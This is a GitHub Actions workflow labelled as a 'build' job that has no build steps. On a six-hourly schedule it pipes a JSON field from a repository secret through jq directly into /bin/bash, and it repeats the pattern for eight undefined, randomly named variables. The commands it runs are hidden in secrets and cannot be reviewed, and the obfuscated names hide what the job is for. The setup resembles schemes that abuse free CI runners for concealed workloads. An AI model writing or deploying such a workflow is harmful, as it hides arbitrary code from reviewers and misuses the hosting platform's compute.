name: youngroundyy
on:
  workflow_dispatch:
  schedule:
    - cron: '9 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: youngroundyy
        env:
          q5: ${{ secrets.q5 }}
        run: |
          echo $q5 | jq -r .ix50042 | /bin/bash
          echo $uu9 | jq -r .kp73 | /bin/bash
          echo $v82555 | jq -r .dthch75256 | /bin/bash
          echo $ho0 | jq -r .vjgi3 | /bin/bash
          echo $euo4475 | jq -r .fpg49952 | /bin/bash
          echo $yittm84 | jq -r .fxtxv5290 | /bin/bash
          echo $y8 | jq -r .hb3425 | /bin/bash
          echo $agyw8871 | jq -r .owqfz3310 | /bin/bash
          echo $e15470 | jq -r .evsp4352 | /bin/bash

